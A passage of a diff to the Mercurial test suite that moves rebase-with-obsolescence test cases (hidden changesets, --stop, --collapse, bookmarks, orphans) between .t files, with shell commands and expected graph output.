(--hidden, rebaseskipobsolete=0, directaccess, etc.), -rebasestate may contain hidden hashes. "rebase --abort" should work regardless. - - $ hg init $TESTTMP/hidden-state1 - $ cd $TESTTMP/hidden-state1 - $ cat >> .hg/hgrc <<EOF - > [experimental] - > rebaseskipobsolete=0 - > EOF - - $ hg debugdrawdag <<'EOS' - > C - > | - > D B # prune: B, C - > |/ # B/D=B - > A - > EOS - - $ eval `hg tags -T '{tag}={node}\n'` - $ rm .hg/localtags - - $ hg update -q $C --hidden - updated to hidden changeset 7829726be4dc - (hidden revision '7829726be4dc' is pruned) - $ hg rebase -s $B -d $D - rebasing 1:2ec65233581b "B" - merging D - warning: conflicts while merging D! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - - $ cp -R . $TESTTMP/hidden-state2 - - $ hg log -G - @ 2:b18e25de2cf5 D - | - | % 1:2ec65233581b B (pruned using prune) - |/ - o 0:426bada5c675 A - - $ hg summary - parent: 2:b18e25de2cf5 tip - D - branch: default - commit: 1 modified, 1 added, 1 unknown, 1 unresolved - update: 1 new changesets, 2 branch heads (merge) - phases: 3 draft - rebase: 0 rebased, 2 remaining (rebase --continue) - - $ hg rebase --abort - rebase aborted - -Also test --continue for the above case - - $ cd $TESTTMP/hidden-state2 - $ hg resolve -m - (no more unresolved files) - continue: hg rebase --continue - $ hg rebase --continue - rebasing 1:2ec65233581b "B" - rebasing 3:7829726be4dc tip "C" - $ hg log -G - @ 5:1964d5d5b547 C - | - o 4:68deb90c12a2 B - | - o 2:b18e25de2cf5 D - | - o 0:426bada5c675 A - -==================== -Test --stop option | -==================== - $ cd .. 
- $ hg init rbstop - $ cd rbstop - $ echo a>a - $ hg ci -Aqma - $ echo b>b - $ hg ci -Aqmb - $ echo c>c - $ hg ci -Aqmc - $ echo d>d - $ hg ci -Aqmd - $ hg up 0 -q - $ echo f>f - $ hg ci -Aqmf - $ echo D>d - $ hg ci -Aqm "conflict with d" - $ hg up 3 -q - $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n" - o 5:00bfc9898aeb test - | conflict with d - | - o 4:dafd40200f93 test - | f - | - | @ 3:055a42cdd887 test - | | d - | | - | o 2:177f92b77385 test - | | c - | | - | o 1:d2ae7f538514 test - |/ b - | - o 0:cb9a9f314b8b test - a - - $ hg rebase -s 1 -d 5 - rebasing 1:d2ae7f538514 "b" - rebasing 2:177f92b77385 "c" - rebasing 3:055a42cdd887 "d" - merging d - warning: conflicts while merging d! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - $ hg rebase --stop - 1 new orphan changesets - $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n" - o 7:7fffad344617 test - | c - | - o 6:b15528633407 test - | b - | - o 5:00bfc9898aeb test - | conflict with d - | - o 4:dafd40200f93 test - | f - | - | @ 3:055a42cdd887 test - | | d - | | - | x 2:177f92b77385 test - | | c - | | - | x 1:d2ae7f538514 test - |/ b - | - o 0:cb9a9f314b8b test - a - -Test it aborts if unstable csets is not allowed: -=============================================== - $ cat >> $HGRCPATH << EOF - > [experimental] - > evolution.allowunstable=False - > EOF - - $ hg strip 6 --no-backup -q - $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n" - o 5:00bfc9898aeb test - | conflict with d - | - o 4:dafd40200f93 test - | f - | - | @ 3:055a42cdd887 test - | | d - | | - | o 2:177f92b77385 test - | | c - | | - | o 1:d2ae7f538514 test - |/ b - | - o 0:cb9a9f314b8b test - a - - $ hg rebase -s 1 -d 5 - rebasing 1:d2ae7f538514 "b" - rebasing 2:177f92b77385 "c" - rebasing 3:055a42cdd887 "d" - merging d - warning: conflicts while 
merging d! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - $ hg rebase --stop - abort: cannot remove original changesets with unrebased descendants - (either enable obsmarkers to allow unstable revisions or use --keep to keep original changesets) - [20] - $ hg rebase --abort - saved backup bundle to $TESTTMP/rbstop/.hg/strip-backup/b15528633407-6eb72b6f-backup.hg - rebase aborted - -Test --stop when --keep is passed: -================================== - $ hg rebase -s 1 -d 5 --keep - rebasing 1:d2ae7f538514 "b" - rebasing 2:177f92b77385 "c" - rebasing 3:055a42cdd887 "d" - merging d - warning: conflicts while merging d! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - $ hg rebase --stop - $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n" - o 7:7fffad344617 test - | c - | - o 6:b15528633407 test - | b - | - o 5:00bfc9898aeb test - | conflict with d - | - o 4:dafd40200f93 test - | f - | - | @ 3:055a42cdd887 test - | | d - | | - | o 2:177f92b77385 test - | | c - | | - | o 1:d2ae7f538514 test - |/ b - | - o 0:cb9a9f314b8b test - a - -Test --stop aborts when --collapse was passed: -============================================= - $ cat >> $HGRCPATH << EOF - > [experimental] - > evolution.allowunstable=True - > EOF - - $ hg strip 6 - saved backup bundle to $TESTTMP/rbstop/.hg/strip-backup/b15528633407-6eb72b6f-backup.hg - $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n" - o 5:00bfc9898aeb test - | conflict with d - | - o 4:dafd40200f93 test - | f - | - | @ 3:055a42cdd887 test - | | d - | | - | o 2:177f92b77385 test - | | c - | | - | o 1:d2ae7f538514 test - |/ b - | - o 0:cb9a9f314b8b test - a - - $ hg rebase -s 1 -d 5 --collapse -m "collapsed b c d" - rebasing 1:d2ae7f538514 "b" - rebasing 2:177f92b77385 "c" - rebasing 3:055a42cdd887 "d" - merging d 
- warning: conflicts while merging d! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - $ hg rebase --stop - abort: cannot stop in --collapse session - [20] - $ hg rebase --abort - rebase aborted - $ hg diff - $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n" - o 5:00bfc9898aeb test - | conflict with d - | - o 4:dafd40200f93 test - | f - | - | @ 3:055a42cdd887 test - | | d - | | - | o 2:177f92b77385 test - | | c - | | - | o 1:d2ae7f538514 test - |/ b - | - o 0:cb9a9f314b8b test - a - -Test --stop raise errors with conflicting options: -================================================= - $ hg rebase -s 3 -d 5 - rebasing 3:055a42cdd887 "d" - merging d - warning: conflicts while merging d! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - $ hg rebase --stop --dry-run - abort: cannot specify both --stop and --dry-run - [10] - - $ hg rebase -s 3 -d 5 - abort: rebase in progress - (use 'hg rebase --continue', 'hg rebase --abort', or 'hg rebase --stop') - [20] - $ hg rebase --stop --continue - abort: cannot specify both --stop and --continue - [10] - -Test --stop moves bookmarks of original revisions to new rebased nodes: -====================================================================== - $ cd .. 
- $ hg init repo - $ cd repo - - $ echo a > a - $ hg ci -Am A - adding a - - $ echo b > b - $ hg ci -Am B - adding b - $ hg book X - $ hg book Y - - $ echo c > c - $ hg ci -Am C - adding c - $ hg book Z - - $ echo d > d - $ hg ci -Am D - adding d - - $ hg up 0 -q - $ echo e > e - $ hg ci -Am E - adding e - created new head - - $ echo doubt > d - $ hg ci -Am "conflict with d" - adding d - - $ hg log -GT "{rev}: {node|short} '{desc}' bookmarks: {bookmarks}\n" - @ 5: 39adf30bc1be 'conflict with d' bookmarks: - | - o 4: 9c1e55f411b6 'E' bookmarks: - | - | o 3: 67a385d4e6f2 'D' bookmarks: Z - | | - | o 2: 49cb3485fa0c 'C' bookmarks: Y - | | - | o 1: 6c81ed0049f8 'B' bookmarks: X - |/ - o 0: 1994f17a630e 'A' bookmarks: - - $ hg rebase -s 1 -d 5 - rebasing 1:6c81ed0049f8 X "B" - rebasing 2:49cb3485fa0c Y "C" - rebasing 3:67a385d4e6f2 Z "D" - merging d - warning: conflicts while merging d! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - $ hg rebase --stop - 1 new orphan changesets - $ hg log -GT "{rev}: {node|short} '{desc}' bookmarks: {bookmarks}\n" - o 7: 9c86c650b686 'C' bookmarks: Y - | - o 6: 9b87b54e5fd8 'B' bookmarks: X - | - @ 5: 39adf30bc1be 'conflict with d' bookmarks: - | - o 4: 9c1e55f411b6 'E' bookmarks: - | - | * 3: 67a385d4e6f2 'D' bookmarks: Z - | | - | x 2: 49cb3485fa0c 'C' bookmarks: - | | - | x 1: 6c81ed0049f8 'B' bookmarks: - |/ - o 0: 1994f17a630e 'A' bookmarks: - diff --git a/tests/test-rebase-obsolete.t b/tests/test-rebase-obsolete2.t copy from tests/test-rebase-obsolete.t copy to tests/test-rebase-obsolete2.t --- a/tests/test-rebase-obsolete.t +++ b/tests/test-rebase-obsolete2.t @@ -18,732 +18,6 @@ > strip= > EOF -Setup rebase canonical repo - - $ hg init base - $ cd base - $ hg unbundle "$TESTDIR/bundles/rebase.hg" - adding changesets - adding manifests - adding file changes - added 8 changesets with 7 changes to 7 files (+2 heads) - new changesets cd010b8cd998:02de42196ebe (8 
drafts) - (run 'hg heads' to see heads, 'hg merge' to merge) - $ hg up tip - 3 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ hg log -G - @ 7:02de42196ebe H - | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - | o 3:32af7686d403 D - | | - | o 2:5fddd98957c8 C - | | - | o 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - - $ cd .. - -simple rebase ---------------------------------- - - $ hg clone base simple - updating to branch default - 3 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ cd simple - $ hg up 32af7686d403 - 3 files updated, 0 files merged, 2 files removed, 0 files unresolved - $ hg rebase -d eea13746799a - rebasing 1:42ccdea3bb16 "B" - rebasing 2:5fddd98957c8 "C" - rebasing 3:32af7686d403 "D" - $ hg log -G - @ 10:8eeb3c33ad33 D - | - o 9:2327fea05063 C - | - o 8:e4e5be0395b2 B - | - | o 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ hg log --hidden -G - @ 10:8eeb3c33ad33 D - | - o 9:2327fea05063 C - | - o 8:e4e5be0395b2 B - | - | o 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - | x 3:32af7686d403 D (rewritten using rebase as 10:8eeb3c33ad33) - | | - | x 2:5fddd98957c8 C (rewritten using rebase as 9:2327fea05063) - | | - | x 1:42ccdea3bb16 B (rewritten using rebase as 8:e4e5be0395b2) - |/ - o 0:cd010b8cd998 A - - $ hg debugobsolete - 42ccdea3bb16d28e1848c95fe2e44c000f3f21b1 e4e5be0395b2cbd471ed22a26b1b6a1a0658a794 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 5fddd98957c8a54a4d436dfe1da9d87f21a1b97b 2327fea05063f39961b14cb69435a9898dc9a245 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 32af7686d403cf45b5d95f2d70cebea587ac806a 8eeb3c33ad33d452c89e5dcf611c347f978fb42b 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 
'user': 'test'} - - - $ cd .. - -empty changeset ---------------------------------- - - $ hg clone base empty - updating to branch default - 3 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ cd empty - $ hg up eea13746799a - 1 files updated, 0 files merged, 1 files removed, 0 files unresolved - -We make a copy of both the first changeset in the rebased and some other in the -set. - - $ hg graft 42ccdea3bb16 32af7686d403 - grafting 1:42ccdea3bb16 "B" - grafting 3:32af7686d403 "D" - $ hg rebase -s 42ccdea3bb16 -d . - rebasing 1:42ccdea3bb16 "B" - note: not rebasing 1:42ccdea3bb16 "B", its destination already has all its changes - rebasing 2:5fddd98957c8 "C" - rebasing 3:32af7686d403 "D" - note: not rebasing 3:32af7686d403 "D", its destination already has all its changes - $ hg log -G - o 10:5ae4c968c6ac C - | - @ 9:08483444fef9 D - | - o 8:8877864f1edb B - | - | o 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ hg log --hidden -G - o 10:5ae4c968c6ac C - | - @ 9:08483444fef9 D - | - o 8:8877864f1edb B - | - | o 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - | x 3:32af7686d403 D (pruned using rebase) - | | - | x 2:5fddd98957c8 C (rewritten using rebase as 10:5ae4c968c6ac) - | | - | x 1:42ccdea3bb16 B (pruned using rebase) - |/ - o 0:cd010b8cd998 A - - $ hg debugobsolete - 42ccdea3bb16d28e1848c95fe2e44c000f3f21b1 0 {cd010b8cd998f3981a5a8115f94f8da4ab506089} (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '0', 'operation': 'rebase', 'user': 'test'} - 5fddd98957c8a54a4d436dfe1da9d87f21a1b97b 5ae4c968c6aca831df823664e706c9d4aa34473d 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 32af7686d403cf45b5d95f2d70cebea587ac806a 0 {5fddd98957c8a54a4d436dfe1da9d87f21a1b97b} (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '0', 'operation': 'rebase', 'user': 'test'} - - -More complex 
case where part of the rebase set were already rebased - - $ hg rebase --rev 'desc(D)' --dest 'desc(H)' - rebasing 9:08483444fef9 "D" - 1 new orphan changesets - $ hg debugobsolete - 42ccdea3bb16d28e1848c95fe2e44c000f3f21b1 0 {cd010b8cd998f3981a5a8115f94f8da4ab506089} (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '0', 'operation': 'rebase', 'user': 'test'} - 5fddd98957c8a54a4d436dfe1da9d87f21a1b97b 5ae4c968c6aca831df823664e706c9d4aa34473d 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 32af7686d403cf45b5d95f2d70cebea587ac806a 0 {5fddd98957c8a54a4d436dfe1da9d87f21a1b97b} (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '0', 'operation': 'rebase', 'user': 'test'} - 08483444fef91d6224f6655ee586a65d263ad34c 4596109a6a4328c398bde3a4a3b6737cfade3003 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - $ hg log -G - @ 11:4596109a6a43 D - | - | * 10:5ae4c968c6ac C - | | - | x 9:08483444fef9 D (rewritten using rebase as 11:4596109a6a43) - | | - | o 8:8877864f1edb B - | | - o | 7:02de42196ebe H - | | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ hg rebase --source 'desc(B)' --dest 'tip' --config experimental.rebaseskipobsolete=True - rebasing 8:8877864f1edb "B" - note: not rebasing 9:08483444fef9 "D", already in destination as 11:4596109a6a43 tip "D" - rebasing 10:5ae4c968c6ac "C" - $ hg debugobsolete - 42ccdea3bb16d28e1848c95fe2e44c000f3f21b1 0 {cd010b8cd998f3981a5a8115f94f8da4ab506089} (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '0', 'operation': 'rebase', 'user': 'test'} - 5fddd98957c8a54a4d436dfe1da9d87f21a1b97b 5ae4c968c6aca831df823664e706c9d4aa34473d 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 32af7686d403cf45b5d95f2d70cebea587ac806a 0 {5fddd98957c8a54a4d436dfe1da9d87f21a1b97b} (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '0', 'operation': 'rebase', 'user': 'test'} - 
08483444fef91d6224f6655ee586a65d263ad34c 4596109a6a4328c398bde3a4a3b6737cfade3003 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 8877864f1edb05d0e07dc4ba77b67a80a7b86672 462a34d07e599b87ea08676a449373fe4e2e1347 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 5ae4c968c6aca831df823664e706c9d4aa34473d 98f6af4ee9539e14da4465128f894c274900b6e5 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - $ hg log --rev 'contentdivergent()' - $ hg log -G - o 13:98f6af4ee953 C - | - o 12:462a34d07e59 B - | - @ 11:4596109a6a43 D - | - o 7:02de42196ebe H - | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ hg log --style default --debug -r 4596109a6a4328c398bde3a4a3b6737cfade3003 - changeset: 11:4596109a6a4328c398bde3a4a3b6737cfade3003 - phase: draft - parent: 7:02de42196ebee42ef284b6780a87cdc96e8eaab6 - parent: -1:0000000000000000000000000000000000000000 - manifest: 11:a91006e3a02f1edf631f7018e6e5684cf27dd905 - user: Nicolas Dumazet <nicdumz.commits@gmail.com> - date: Sat Apr 30 15:24:48 2011 +0200 - files+: D - extra: branch=default - extra: rebase_source=08483444fef91d6224f6655ee586a65d263ad34c - extra: source=32af7686d403cf45b5d95f2d70cebea587ac806a - description: - D - - - $ hg up -qr 'desc(G)' - $ hg graft 4596109a6a4328c398bde3a4a3b6737cfade3003 - grafting 11:4596109a6a43 "D" - $ hg up -qr 'desc(E)' - $ hg rebase -s tip -d . 
- rebasing 14:9e36056a46e3 tip "D" - $ hg log --style default --debug -r tip - changeset: 15:627d4614809036ba22b9e7cb31638ddc06ab99ab - tag: tip - phase: draft - parent: 4:9520eea781bcca16c1e15acc0ba14335a0e8e5ba - parent: -1:0000000000000000000000000000000000000000 - manifest: 15:648e8ede73ae3e497d093d3a4c8fcc2daa864f42 - user: Nicolas Dumazet <nicdumz.commits@gmail.com> - date: Sat Apr 30 15:24:48 2011 +0200 - files+: D - extra: branch=default - extra: intermediate-source=4596109a6a4328c398bde3a4a3b6737cfade3003 - extra: rebase_source=9e36056a46e37c9776168c7375734eebc70e294f - extra: source=32af7686d403cf45b5d95f2d70cebea587ac806a - description: - D - - -Start rebase from a commit that is obsolete but not hidden only because it's -a working copy parent. We should be moved back to the starting commit as usual -even though it is hidden (until we're moved there). - - $ hg --hidden up -qr 'first(hidden())' - updated to hidden changeset 42ccdea3bb16 - (hidden revision '42ccdea3bb16' is pruned) - $ hg rebase --rev 13 --dest 15 - rebasing 13:98f6af4ee953 "C" - $ hg log -G - o 16:294a2b93eb4d C - | - o 15:627d46148090 D - | - | o 12:462a34d07e59 B - | | - | o 11:4596109a6a43 D - | | - | o 7:02de42196ebe H - | | - +---o 6:eea13746799a G - | |/ - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - | @ 1:42ccdea3bb16 B (pruned using rebase) - |/ - o 0:cd010b8cd998 A - - - $ cd .. 
- -collapse rebase ---------------------------------- - - $ hg clone base collapse - updating to branch default - 3 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ cd collapse - $ hg rebase -s 42ccdea3bb16 -d eea13746799a --collapse - rebasing 1:42ccdea3bb16 "B" - rebasing 2:5fddd98957c8 "C" - rebasing 3:32af7686d403 "D" - $ hg log -G - o 8:4dc2197e807b Collapsed revision - | - | @ 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ hg log --hidden -G - o 8:4dc2197e807b Collapsed revision - | - | @ 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - | x 3:32af7686d403 D (rewritten using rebase as 8:4dc2197e807b) - | | - | x 2:5fddd98957c8 C (rewritten using rebase as 8:4dc2197e807b) - | | - | x 1:42ccdea3bb16 B (rewritten using rebase as 8:4dc2197e807b) - |/ - o 0:cd010b8cd998 A - - $ hg id --debug -r tip - 4dc2197e807bae9817f09905b50ab288be2dbbcf tip - $ hg debugobsolete - 42ccdea3bb16d28e1848c95fe2e44c000f3f21b1 4dc2197e807bae9817f09905b50ab288be2dbbcf 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '13', 'fold-id': '6fb65cdc', 'fold-idx': '1', 'fold-size': '3', 'operation': 'rebase', 'user': 'test'} - 5fddd98957c8a54a4d436dfe1da9d87f21a1b97b 4dc2197e807bae9817f09905b50ab288be2dbbcf 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '13', 'fold-id': '6fb65cdc', 'fold-idx': '2', 'fold-size': '3', 'operation': 'rebase', 'user': 'test'} - 32af7686d403cf45b5d95f2d70cebea587ac806a 4dc2197e807bae9817f09905b50ab288be2dbbcf 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '13', 'fold-id': '6fb65cdc', 'fold-idx': '3', 'fold-size': '3', 'operation': 'rebase', 'user': 'test'} - - $ cd .. - -Rebase set has hidden descendants ---------------------------------- - -We rebase a changeset which has hidden descendants. Hidden changesets must not -be rebased. 
- - $ hg clone base hidden - updating to branch default - 3 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ cd hidden - $ hg log -G - @ 7:02de42196ebe H - | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - | o 3:32af7686d403 D - | | - | o 2:5fddd98957c8 C - | | - | o 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - - $ hg rebase -s 5fddd98957c8 -d eea13746799a - rebasing 2:5fddd98957c8 "C" - rebasing 3:32af7686d403 "D" - $ hg log -G - o 9:cf44d2f5a9f4 D - | - o 8:e273c5e7d2d2 C - | - | @ 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - | o 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - - $ hg rebase -s 42ccdea3bb16 -d 02de42196ebe - rebasing 1:42ccdea3bb16 "B" - $ hg log -G - o 10:7c6027df6a99 B - | - | o 9:cf44d2f5a9f4 D - | | - | o 8:e273c5e7d2d2 C - | | - @ | 7:02de42196ebe H - | | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ hg log --hidden -G - o 10:7c6027df6a99 B - | - | o 9:cf44d2f5a9f4 D - | | - | o 8:e273c5e7d2d2 C - | | - @ | 7:02de42196ebe H - | | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - | x 3:32af7686d403 D (rewritten using rebase as 9:cf44d2f5a9f4) - | | - | x 2:5fddd98957c8 C (rewritten using rebase as 8:e273c5e7d2d2) - | | - | x 1:42ccdea3bb16 B (rewritten using rebase as 10:7c6027df6a99) - |/ - o 0:cd010b8cd998 A - - $ hg debugobsolete - 5fddd98957c8a54a4d436dfe1da9d87f21a1b97b e273c5e7d2d29df783dce9f9eaa3ac4adc69c15d 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 32af7686d403cf45b5d95f2d70cebea587ac806a cf44d2f5a9f4297a62be94cbdd3dff7c7dc54258 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 42ccdea3bb16d28e1848c95fe2e44c000f3f21b1 7c6027df6a99d93f461868e5433f63bde20b6dfb 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 
'rebase', 'user': 'test'} - -Test that rewriting leaving instability behind is allowed ---------------------------------------------------------------------- - - $ hg log -r 'children(8)' - 9:cf44d2f5a9f4 D (no-eol) - $ hg rebase -r 8 - rebasing 8:e273c5e7d2d2 "C" - 1 new orphan changesets - $ hg log -G - o 11:0d8f238b634c C - | - o 10:7c6027df6a99 B - | - | * 9:cf44d2f5a9f4 D - | | - | x 8:e273c5e7d2d2 C (rewritten using rebase as 11:0d8f238b634c) - | | - @ | 7:02de42196ebe H - | | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ cd .. - $ cp -R hidden stabilize - $ cd stabilize - $ hg rebase --auto-orphans '0::' -d 10 - abort: cannot specify both --auto-orphans and --dest - [10] - $ hg rebase --auto-orphans '0::' - rebasing 9:cf44d2f5a9f4 "D" - $ hg log -G - o 12:7e3935feaa68 D - | - o 11:0d8f238b634c C - | - o 10:7c6027df6a99 B - | - @ 7:02de42196ebe H - | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - - $ cd ../hidden - $ rm -r ../stabilize - -Test multiple root handling ------------------------------------- - - $ hg rebase --dest 4 --rev '7+11+9' - rebasing 9:cf44d2f5a9f4 "D" - rebasing 7:02de42196ebe "H" - rebasing 11:0d8f238b634c tip "C" - $ hg log -G - o 14:1e8370e38cca C - | - @ 13:bfe264faf697 H - | - | o 12:102b4c1d889b D - |/ - | * 10:7c6027df6a99 B - | | - | x 7:02de42196ebe H (rewritten using rebase as 13:bfe264faf697) - | | - +---o 6:eea13746799a G - | |/ - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ cd .. 
- -Detach both parents - - $ hg init double-detach - $ cd double-detach - - $ hg debugdrawdag <<EOF - > F - > /| - > C E - > | | - > B D G - > \|/ - > A - > EOF - - $ hg rebase -d G -r 'B + D + F' - rebasing 1:112478962961 B "B" - rebasing 2:b18e25de2cf5 D "D" - rebasing 6:f15c3adaf214 F tip "F" - abort: cannot rebase 6:f15c3adaf214 without moving at least one of its parents - [10] - - $ cd .. - -test on rebase dropping a merge - -(setup) - - $ hg init dropmerge - $ cd dropmerge - $ hg unbundle "$TESTDIR/bundles/rebase.hg" - adding changesets - adding manifests - adding file changes - added 8 changesets with 7 changes to 7 files (+2 heads) - new changesets cd010b8cd998:02de42196ebe (8 drafts) - (run 'hg heads' to see heads, 'hg merge' to merge) - $ hg up 3 - 4 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ hg merge 7 - 2 files updated, 0 files merged, 0 files removed, 0 files unresolved - (branch merge, don't forget to commit) - $ hg ci -m 'M' - $ echo I > I - $ hg add I - $ hg ci -m I - $ hg log -G - @ 9:4bde274eefcf I - | - o 8:53a6a128b2b7 M - |\ - | o 7:02de42196ebe H - | | - | | o 6:eea13746799a G - | |/| - | o | 5:24b6387c8c8c F - | | | - | | o 4:9520eea781bc E - | |/ - o | 3:32af7686d403 D - | | - o | 2:5fddd98957c8 C - | | - o | 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - -(actual test) - - $ hg rebase --dest 6 --rev '((desc(H) + desc(D))::) - desc(M)' - rebasing 3:32af7686d403 "D" - rebasing 7:02de42196ebe "H" - rebasing 9:4bde274eefcf tip "I" - 1 new orphan changesets - $ hg log -G - @ 12:acd174b7ab39 I - | - o 11:6c11a6218c97 H - | - | o 10:b5313c85b22e D - |/ - | * 8:53a6a128b2b7 M - | |\ - | | x 7:02de42196ebe H (rewritten using rebase as 11:6c11a6218c97) - | | | - o---+ 6:eea13746799a G - | | | - | | o 5:24b6387c8c8c F - | | | - o---+ 4:9520eea781bc E - / / - x | 3:32af7686d403 D (rewritten using rebase as 10:b5313c85b22e) - | | - o | 2:5fddd98957c8 C - | | - o | 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - - -Test hidden 
changesets in the rebase set (issue4504) - - $ hg up --hidden 9 - 3 files updated, 0 files merged, 1 files removed, 0 files unresolved - updated to hidden changeset 4bde274eefcf - (hidden revision '4bde274eefcf' was rewritten as: acd174b7ab39) - $ echo J > J - $ hg add J - $ hg commit -m J - 1 new orphan changesets - $ hg debugobsolete `hg log --rev . -T '{node}'` - 1 new obsolescence markers - obsoleted 1 changesets - - $ hg rebase --rev .~1::. --dest 'max(desc(D))' --traceback --config experimental.rebaseskipobsolete=off - rebasing 9:4bde274eefcf "I" - rebasing 13:06edfc82198f tip "J" - 2 new content-divergent changesets - $ hg log -G - @ 15:5ae8a643467b J - | - * 14:9ad579b4a5de I - | - | * 12:acd174b7ab39 I - | | - | o 11:6c11a6218c97 H - | | - o | 10:b5313c85b22e D - |/ - | * 8:53a6a128b2b7 M - | |\ - | | x 7:02de42196ebe H (rewritten using rebase as 11:6c11a6218c97) - | | | - o---+ 6:eea13746799a G - | | | - | | o 5:24b6387c8c8c F - | | | - o---+ 4:9520eea781bc E - / / - x | 3:32af7686d403 D (rewritten using rebase as 10:b5313c85b22e) - | | - o | 2:5fddd98957c8 C - | | - o | 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - - $ hg up 14 -C - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo "K" > K - $ hg add K - $ hg commit --amend -m "K" - 1 new orphan changesets - $ echo "L" > L - $ hg add L - $ hg commit -m "L" - $ hg up '.^' - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo "M" > M - $ hg add M - $ hg commit --amend -m "M" - 1 new orphan changesets - $ hg log -G - @ 18:bfaedf8eb73b M - | - | * 